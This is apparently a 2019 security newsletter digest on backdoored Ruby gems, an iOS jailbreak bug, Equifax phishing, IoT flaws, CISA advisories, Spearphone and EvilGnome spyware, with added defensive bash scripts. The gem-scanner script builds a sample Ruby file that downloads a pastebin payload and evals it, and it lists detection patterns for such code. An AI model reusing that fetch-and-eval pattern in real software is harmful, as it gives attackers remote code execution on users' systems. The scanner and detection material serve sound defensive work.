Rubys in the Rough

    The Ruby programming language is a high-level, general-purpose language created by Yukihiro Matsumoto, who wanted a genuinely object-oriented language and found the options available at the time lacking. Ruby libraries are distributed as gems through RubyGems, the package manager that gives the ecosystem a standard way to install and update programs and libraries.

    Thousands of users are potentially affected by backdoors found in 18 versions of 11 Ruby libraries. The injected code launched cryptocurrency miners inside the Ruby projects that loaded the libraries. It also harvested and shipped data, including the application's environment variables (which on a server commonly hold credentials, payment and service-provider keys, and the database connection string), to a server in Ukraine. The backdoor also gave the attacker remote code execution: code carried in a specially crafted cookie sent to the application was executed by the backdoored library. The code was inserted into several cryptocurrency-related libraries as well as utilities such as omniauth_amazon and cron_parser. These are all relatively small packages, but when the attacker pushed backdoored releases of rest-client, a much more widely used and scrutinized project, the backdoor was identified within hours, and the other projects it had been inserted into were found soon after.
    Because of the quick identification, the latest compromised release of this older rest-client branch saw only around a thousand downloads. The smaller libraries, however, carried the backdoor for over a month; thankfully, their combined downloads numbered fewer than 3,000. The previous attack of this kind hit the strong_password gem, which, rather than holding the malicious code itself, downloaded its payload from pastebin.com at run time.
    With crowd-sourced and open-source dependencies, one must take extra precautions: review the diff between the version in use and the update before adopting it, and pin to versions that have actually been reviewed. Without that due diligence, a project can unknowingly pull in malicious code or rely on a compromised dependency, exposing both developer credentials and users' data. Relying on a gem's description, and on faith that a widely used gem must be safe, is a disservice to you and to the community at large.
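Two checks that make "evaluate the diff before updating" concrete, as an added example (not RubyGems' or rest-client's own tooling). The pattern list is a heuristic drawn from the backdoors described above (payload pulled from pastebin.com, base64-obfuscated code handed to eval, environment harvesting); the sample gem trees are constructed here to imitate that pattern and are not the real payload. A hit means "read this diff carefully", not "compromised", and a genuine HTTP client library will naturally contain network code, which is why the second function looks only at lines an update adds.

```bash
#!/usr/bin/env bash
# Heuristic review of a gem update. Added example; the regex below is an
# assumption drawn from the backdoor write-ups above, not an official list.
#
# Fetching the two versions to compare needs network and is not run here:
#   gem fetch rest-client -v 1.6.9  && gem unpack rest-client-1.6.9.gem
#   gem fetch rest-client -v 1.6.13 && gem unpack rest-client-1.6.13.gem
#   scan_update_diff rest-client-1.6.9 rest-client-1.6.13

SUSPICIOUS_RE='pastebin\.com|Base64\.(urlsafe_)?decode64|eval\(|open-uri|URI\.open|ENV\.to_h|ENV\.each|Marshal\.load'

# scan_gem_source DIR -> prints file:line:text for every suspicious line in the
# unpacked gem; returns 0 if anything matched, 1 if nothing did.
scan_gem_source() {
  local dir="$1" hits
  hits=$(grep -rnE --include='*.rb' --include='*.gemspec' --include='Rakefile' \
           -e "$SUSPICIOUS_RE" "$dir" 2>/dev/null || true)
  [ -n "$hits" ] || return 1
  printf '%s\n' "$hits"
}

# scan_update_diff OLD_DIR NEW_DIR -> same, but only over lines the update ADDS,
# which is what to read when deciding whether to accept a new version.
scan_update_diff() {
  local old="$1" new="$2" hits
  hits=$(diff -ruN "$old" "$new" | grep -E '^\+[^+]' | grep -E "$SUSPICIOUS_RE" || true)
  [ -n "$hits" ] || return 1
  printf '%s\n' "$hits"
}

# count_hits DIR / count_diff_hits OLD NEW -> number of suspicious lines (0 = clean)
count_hits()      { scan_gem_source "$1" | wc -l | tr -d ' '; }
count_diff_hits() { scan_update_diff "$1" "$2" | wc -l | tr -d ' '; }

# make_sample_gems -> builds two constructed versions of a tiny gem under a temp
# directory (clean/ and backdoored/) and prints that directory. The backdoored
# copy imitates the pattern described above; it is not the real payload.
make_sample_gems() {
  local root
  root=$(mktemp -d)
  mkdir -p "$root/clean/lib" "$root/backdoored/lib"
  cat > "$root/clean/lib/parser.rb" <<'EOF'
module Parser
  def self.parse(line)
    line.split(',').map(&:strip)
  end
end
EOF
  cat > "$root/backdoored/lib/parser.rb" <<'EOF'
module Parser
  def self.parse(line)
    line.split(',').map(&:strip)
  end
end
begin
  require 'open-uri'
  payload = URI.open('https://pastebin.com/raw/XXXXXXXX').read
  eval(Base64.decode64(payload))
rescue StandardError
end
EOF
  printf '%s\n' "$root"
}

SAMPLE=$(make_sample_gems)
echo "== clean tree =="
scan_gem_source "$SAMPLE/clean" || echo "(no indicators)"
echo "== backdoored tree =="
scan_gem_source "$SAMPLE/backdoored" || echo "(no indicators)"
echo "== lines the 'update' adds =="
scan_update_diff "$SAMPLE/clean" "$SAMPLE/backdoored" || echo "(no indicators)"
```

Run against real unpacked gems, the clean tree of the sample above reports nothing, while the backdoored tree and the diff both flag the three lines that fetch, decode and eval a remote payload. Pair this with a pinned Gemfile.lock so that an update cannot slip in without the diff having been read.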
Sources
https://securityaffairs.co/wordpress/90146/hacking/ruby-libraries-backdoor.html

https://github.com/rest-client/rest-client/issues/713

https://www.zdnet.com/article/backdoor-code-found-in-11-ruby-libraries/

Mistake: Apple accidentally Un-Patches Old Flaw

    Apple accidentally reintroduced in iOS 12.4 a vulnerability it had patched in iOS 12.3. This led security researcher Pwn20wnd to release a jailbreak for iOS 12.4 called “unc0ver 3.5.0,” the first jailbreak in years to work on up-to-date iPhones. That is significant because, as Motherboard reports, iPhone bugs are so valuable that they are often never reported to Apple at all, and jailbreak exploits are routinely sold for large sums. For example, the FBI reportedly paid over $1.2 million for an exploit that gave it access to the iPhone 5c used by San Bernardino shooter Syed Farook.

    Another reason researchers may be unwilling to report bugs to Apple is that Apple's incentives are weak. After declining to run a bug bounty program for years, Apple announced one in 2016. Rewards range from $25,000 for “Access from a sandboxed process to user data outside of that sandbox process” to $200,000 for “Secure boot firmware components.” While that may sound like a lot of money, it is small compared to what brokers like Zerodium and Exodus Intelligence pay for similar exploits: Zerodium has offered up to $1.5 million for exploits enabling a jailbreak, and Exodus up to $500,000. Some researchers also withhold bugs because patching them would interfere with their further research. According to Luca Todesco, a well-known figure in the iPhone jailbreak community, “Either you report and kill your own bugs, or you decide not to report the bug so that you don’t complicate your own life and you can keep doing research.”

    The vulnerability used in this jailbreak was discovered by Ned Williamson of Google Project Zero. The bug, CVE-2019-8605, could allow a malicious application to “execute arbitrary code with system privileges.” According to The Hacker News, “besides embedding the exploit into an innocent-looking app, the vulnerability can also be exploited remotely by combining it with sandbox bypass flaws in Apple Safari web browser or other Internet exposed services.” Even with this vulnerability, remotely hacking an iPhone remains difficult. It is substantially less difficult, though, while this bug ships on current iPhones: the privilege-escalation stage of a remote chain is already public, so an attacker only needs to pair it with an entry point such as a browser bug.
Sources:
https://www.vice.com/en_us/article/qvgp77/hacker-releases-first-public-iphone-jailbreak-in-years

https://thehackernews.com/2019/08/ios-iphone-jailbreak.html

https://support.apple.com/en-us/HT210118

https://www.vice.com/en_us/article/gybppx/iphone-bugs-are-too-valuable-to-report-to-apple

This is a Great Article by the Knowbe4 Company

KnowBe4 is a great solution for companies that need to train users on social engineering issues.
Here is a great example of the content they deliver to their customer base.

Scam of the Week:
Equifax Settlement Phishing

Well, that did not take long! The Equifax Data Breach resulted in a settlement
and those affected have a choice between free credit monitoring or a $125
payment. Internet lowlifes are now targeting victims of the Equifax data breach
with phishing attacks and are spoofing Equifax’s settlement page.

Your users should report these as malicious emails. If they fall for it and
click on the link, they are likely winding up on a spoofed site that looks very
similar to the existing Equifax settlement page.

There, they are going to be exposed to a social engineering scam, trying to
steal as much data as possible.

I suggest you send the following to your employees, friends and family.
You’re welcome to copy/paste/edit:


ALERT: Internet bad guys are now trying to trick you into filing an Equifax
claim and get a $125 payment because your personal data was in the Equifax
data breach. They are sending phishing attacks that look like they come from
Equifax and when you click on the links, you wind up on a fake website that
looks like it’s Equifax, but will try to steal your personal information.
Don’t fall for it.

If you want to file a claim, go to the legit FTC website and click on the blue
“File a Claim” button. The website will check your eligibility for that claim;
not everyone’s information was compromised.


Go to their blog at https://blog.knowbe4.com/ and also explore the free tools on their site https://www.knowbe4.com/free-it-security-tools

More examples of Speed to market not Secure First

    New technology often saturates a market before it has fully ripened. The race to be first to market is visible in household names like Alexa, BlackBerry, or even the Oculus Rift: while they are not always the best at what they do, familiarity smooths over many of the kinks in the products they ship.

    The Hickory Smart Bluetooth Enabled Deadbolt lets its user manage home security remotely and confirm the door is locked when they worry they forgot to do so on the way out. Useful as that sounds to a potential customer, Rapid7 security researchers have uncovered six vulnerabilities in it. One of the most concerning is cleartext credential transmission by the Hickory Smart Ethernet Bridge device, something I would expect even the least security-minded designer to avoid.

    The rest of the traffic is encrypted, and turning the captured credentials into control of the deadbolt would take more work, but if the user had changed the credentials from the defaults, any password an adversary captured is likely reused elsewhere and could feed future credential stuffing attacks against that user. The Amcrest IP2M-841B IP camera is a rebranded Dahua camera, and Dahua has a history of security issues. The camera has a bug that allows anyone who can connect to it over HTTP, with no authentication, to retrieve and decode its audio output for their listening pleasure.

    The camera wraps the stream in a DHAV container, but it is trivial to unwrap and play in VLC. In the haste to ship product, the companies rebranding Dahua hardware appear to keep their products at different patch levels, exposing users to issues Dahua may already have fixed upstream. As Amcrest is one of many companies selling rebranded Dahua products, it is unknown how many products share this bug.

    While the focus on being first to market may establish a foothold in consumers' homes, it also leaves those customers exposed to whatever security risks were left on the cutting-room floor in the rush to get the product out the door. Testing and security are becoming more challenging by the day, and each year we find our old standards insufficient. Gaining access to an unlocked door or a bugged camera may not be cost-effective to do at scale against the average person, but it easily puts higher-value targets at risk, and simply not being a target is no excuse to support these practices.

Sources:

El Paso and Dayton Tragedy-Related Scams and Malware Campaigns

In the wake of the recent shootings in El Paso, TX, and Dayton, OH, the
Cybersecurity and Infrastructure Security Agency (CISA) advises users to watch
out for possible malicious cyber activity seeking to capitalize on these tragic
events. Users should exercise caution in handling emails related to the
shootings, even if they appear to originate from trusted sources. Fraudulent
emails often contain links or attachments that direct users to phishing or
malware-infected websites. Emails requesting donations from duplicitous
charitable organizations are also common after tragic events. Be wary of
fraudulent social media pleas, calls, texts, donation websites, and
door-to-door solicitations relating to these events.

To avoid becoming a victim of malicious activity, users and administrators
should consider taking the following preventive measures:

NIST Publishes Multifactor Authentication Practice Guide

The National Institute of Standards and Technology (NIST) National
Cybersecurity Center of Excellence (NCCoE) has published NIST Cybersecurity
Practice Guide: Multifactor Authentication for E-Commerce. The guide provides
e-commerce organizations multifactor authentication (MFA) protection methods
they can implement to reduce fraudulent purchases.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages
e-commerce organizations to download the guide to learn how to prevent
e-commerce fraud using MFA solutions.

Cylance Antivirus Vulnerability

Original
release date: August 2, 2019

The CERT Coordination Center (CERT/CC) has released information on a
vulnerability affecting Cylance Antivirus products. A remote attacker could
exploit this vulnerability to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users
and administrators to review CERT/CC Vulnerability Note VU#489481 and the
Cylance Resolution for BlackBerry Cylance Bypass webpage for patch information
and additional recommended workarounds.

Steps to Safeguard Against Ransomware Attacks

Original
release date: July 30, 2019

The Cybersecurity and Infrastructure Security Agency (CISA), Multi-State
Information Sharing & Analysis Center (MS-ISAC), National Governors
Association (NGA), and the National Association of State Chief Information
Officers (NASCIO) have released a Joint Ransomware Statement with
recommendations for state and local governments to build resilience against
ransomware:

  1. Back up systems—now (and daily). Immediately and regularly back up all
     critical agency and system configuration information on a separate device
     and store the backups offline, verifying their integrity and restoration
     process. If recovering after an attack, restore a stronger system than the
     one lost, fully patched and updated to the latest version.
  2. Reinforce basic cybersecurity awareness and education. Ransomware attacks
     often require the human element to succeed. Refresh employee training on
     recognizing cyber threats, phishing, and suspicious links—the most common
     vectors for ransomware attacks. Remind employees of how to report incidents
     to appropriate IT staff in a timely manner, which should include
     out-of-band communication paths.
  3. Revisit and refine cyber incident response plans. Have a clear plan to
     address attacks when they occur, including when internal capabilities are
     overwhelmed. Make sure response plans include how to request assistance
     from external cyber first responders, such as state agencies, CISA, and
     MS-ISAC, in the event of an attack.
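Step 1 above made concrete, as an added example (not a CISA or MS-ISAC tool): take the backup, record an integrity hash beside it, and rehearse the restore rather than assuming it works. It assumes GNU tar and sha256sum; the destination directory stands in for the "separate device" and the sample configuration tree is constructed here. Copy the archive and its .sha256 sidecar to offline media afterwards, since a backup the ransomware can reach is not a backup.

```bash
#!/usr/bin/env bash
# Backup with integrity hash and restore rehearsal. Added example; assumes
# GNU tar and sha256sum are on the PATH.

# make_backup SRC_DIR DEST_DIR -> writes DEST_DIR/<name>-<utc stamp>.tar.gz and
# a .sha256 sidecar, prints the archive path.
make_backup() {
  local src="$1" dest="$2" stamp archive
  stamp=$(date -u +%Y%m%dT%H%M%SZ)
  archive="$dest/$(basename "$src")-$stamp.tar.gz"
  mkdir -p "$dest"
  tar -czf "$archive" -C "$(dirname "$src")" "$(basename "$src")"
  ( cd "$dest" && sha256sum "$(basename "$archive")" > "$(basename "$archive").sha256" )
  printf '%s\n' "$archive"
}

# check_backup_hash ARCHIVE -> 0 if the archive still matches its sidecar
check_backup_hash() {
  local archive="$1"
  ( cd "$(dirname "$archive")" && sha256sum -c --quiet "$(basename "$archive").sha256" )
}

# rehearse_restore ARCHIVE SRC_DIR -> extracts into a scratch directory and
# returns 0 only if the result is byte-for-byte identical to SRC_DIR. Run it
# right after the backup, while the source is still known-good.
rehearse_restore() {
  local archive="$1" src="$2" scratch
  scratch=$(mktemp -d)
  tar -xzf "$archive" -C "$scratch" || return 1
  diff -r "$src" "$scratch/$(basename "$src")" >/dev/null
}

# verify_backup ARCHIVE SRC_DIR -> both checks, with a reason on failure
verify_backup() {
  local archive="$1" src="$2"
  check_backup_hash "$archive" || { echo "FAIL integrity: $archive"; return 1; }
  rehearse_restore "$archive" "$src" || { echo "FAIL restore mismatch: $archive"; return 1; }
  echo "OK verified: $archive"
}

# Demo on a constructed configuration tree (sample data, not a real agency).
demo_root=$(mktemp -d)
mkdir -p "$demo_root/agency/etc"
printf 'listen=443\nauth=mfa\n' > "$demo_root/agency/etc/app.conf"
demo_dest=$(mktemp -d)
demo_archive=$(make_backup "$demo_root/agency" "$demo_dest")
verify_backup "$demo_archive" "$demo_root/agency"
printf 'x' >> "$demo_archive"      # simulate a corrupted or tampered archive
verify_backup "$demo_archive" "$demo_root/agency" || echo "(expected: tampering detected)"
```

The hash check catches silent corruption or tampering of the archive at rest; the rehearsal catches the more common failure, an archive that is intact but does not contain what you thought it did.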

CISA encourages organizations to review the Joint
Ransomware Statement
and the following ransomware guidance:

Spearphone: an attack on Android phones

    A team of researchers (Abhishek Anand, Chen Wang, Jian Liu, Nitesh Saxena, and Yingying Chen) has discovered and demonstrated a new side-channel attack that could allow an app to listen in on speech coming out of an Android phone’s loudspeaker without requesting any device permissions.

    The attack, named Spearphone, takes advantage of the accelerometer built into most Android phones. An accelerometer is a motion sensor that detects the phone being shaken, tilted, or lifted. Crucially, any app can read the accelerometer without requesting a single permission.

    According to The Hacker News, “Since the built-in loudspeaker of a smartphone is placed on the same surface as the embedded motion sensors, it produces surface-borne and aerial speech reverberations in the body of the smartphone when loudspeaker mode is enabled.” Sound is vibration travelling through a medium; our eardrums turn that mechanical vibration into electrical signals that the brain interprets as sound. This attack removes the need for a microphone: the accelerometer itself picks up the vibrations in the phone body and turns them into an electrical signal that can be processed back into speech.

    As a proof of concept, the researchers built an Android application that records the speech reverberations with the accelerometer and sends the captured data to an attacker-controlled server. They showed the attack can be used to spy on phone calls, on voice notes or other media played through the speaker, and on interactions with an assistant such as Google Assistant or Bixby.

    The research team believes the Spearphone attack is dangerous and has “significant value as it can be created by low-profile attackers.” The attack can also be used in gender classification with over 90% accuracy and speaker identification with over 80% accuracy. 
 
read the full article here



Linux users be aware

    Most malware targets Windows desktops or Linux servers; desktop Linux is rarely targeted, partly because of its small user base and partly because of the architecture of the Linux operating system. That makes it all the more surprising that researchers from Intezer recently discovered a Linux desktop spyware implant, dubbed EvilGnome, that no security or antivirus scanner detected at the time.

    EvilGnome is a collection of modules designed to spy on a user’s system and exfiltrate data to an external Command & Control (C2) server controlled by the attacker. It is designed to appear as an extension of the Gnome GUI environment for Linux desktop.

    The malware is a self-extracting archive shell script that installs the modules and sets up persistence through the crontab. The modules are:
    • ShooterSound—records audio clips from the user’s microphone using PulseAudio.
    • ShooterImage—captures screenshots of the user’s desktop.
    • ShooterFile—scans the filesystem and is capable of filtering files by type and creation date.
    • ShooterPing—data exfiltration module, also capable of receiving new commands from the C2 server and stopping other modules from running.
    • ShooterKey—possible keylogger module that appears to be unfinished.

    Many of the modules appear to be very limited or missing some functionality. Also, metadata about the malware’s creation was included in the upload to VirusTotal, leading the researchers to believe this was a prototype version of the malware that was mistakenly released.

    Intezer researchers believe the malware to be tied to the Russian-affiliated group Gamaredon. Not only does EvilGnome use the same hosting provider as Gamaredon for its C2 servers and similar domain naming (.space top-level domains and dynamic DNS hostnames), it was also found on an IP address controlled by Gamaredon two months ago, and it uses techniques and modules similar to Gamaredon’s collection of Windows tools.
    To check whether a Linux system is infected, look in each user's ~/.cache/gnome-software/gnome-shell-extensions directory for an executable called gnome-shell-ext.
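The check above scripted for a responder, as an added example (not Intezer's tooling): it looks for the dropped gnome-shell-ext executable and for the crontab persistence entry the write-up describes. The paths are the ones quoted above; the planted file and the crontab line in the demo are constructed, not a real infection.

```bash
#!/usr/bin/env bash
# EvilGnome triage check. Added example; assumes the indicator paths quoted
# in the write-up above. Run as the user being checked, or point it at each
# home directory in turn.

EVILGNOME_DIR='.cache/gnome-software/gnome-shell-extensions'
EVILGNOME_BIN='gnome-shell-ext'

# evilgnome_file_present HOME_DIR -> 0 if the dropped executable exists there
evilgnome_file_present() {
  local f="$1/$EVILGNOME_DIR/$EVILGNOME_BIN"
  if [ -e "$f" ]; then
    printf 'found dropped binary: %s\n' "$f"
    return 0
  fi
  return 1
}

# evilgnome_cron_present CRONTAB_TEXT -> 0 if any crontab line references the binary
evilgnome_cron_present() {
  printf '%s\n' "$1" | grep -q -- "$EVILGNOME_BIN"
}

# evilgnome_check HOME_DIR [CRONTAB_TEXT] -> 0 if any indicator is present, 1 if none.
# CRONTAB_TEXT defaults to the invoking user's own crontab (crontab -l).
evilgnome_check() {
  local home="$1" cron hit=1
  cron="${2-$(crontab -l 2>/dev/null || true)}"
  evilgnome_file_present "$home" && hit=0
  if evilgnome_cron_present "$cron"; then
    printf 'crontab persistence references %s\n' "$EVILGNOME_BIN"
    hit=0
  fi
  return "$hit"
}

# check_all_homes -> file check over every directory under /home plus $HOME;
# prints hits, returns 0 if any were found.
check_all_homes() {
  local h hit=1
  for h in /home/* "$HOME"; do
    [ -d "$h" ] || continue
    evilgnome_file_present "$h" && hit=0
  done
  return "$hit"
}

# Demo on a constructed home directory (a planted empty file, not real malware).
demo_home=$(mktemp -d)
mkdir -p "$demo_home/$EVILGNOME_DIR"
: > "$demo_home/$EVILGNOME_DIR/$EVILGNOME_BIN"
demo_cron='* * * * * /home/victim/.cache/gnome-software/gnome-shell-extensions/gnome-shell-ext'
evilgnome_check "$demo_home" "$demo_cron" && echo "=> indicators present" || echo "=> clean"
evilgnome_check "$(mktemp -d)" ''        && echo "=> indicators present" || echo "=> clean"
# On a real host: evilgnome_check "$HOME"; check_all_homes
```

A hit on either indicator is grounds to pull the crontab and the contents of that directory for analysis before cleaning; the crontab check also catches the case where the binary has been moved but the persistence entry still points at the original path.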

Sources:

https://thehackernews.com/2019/07/linux-gnome-spyware.html

https://www.bleepingcomputer.com/news/security/new-evilgnome-backdoor-spies-on-linux-users-steals-their-files/

https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/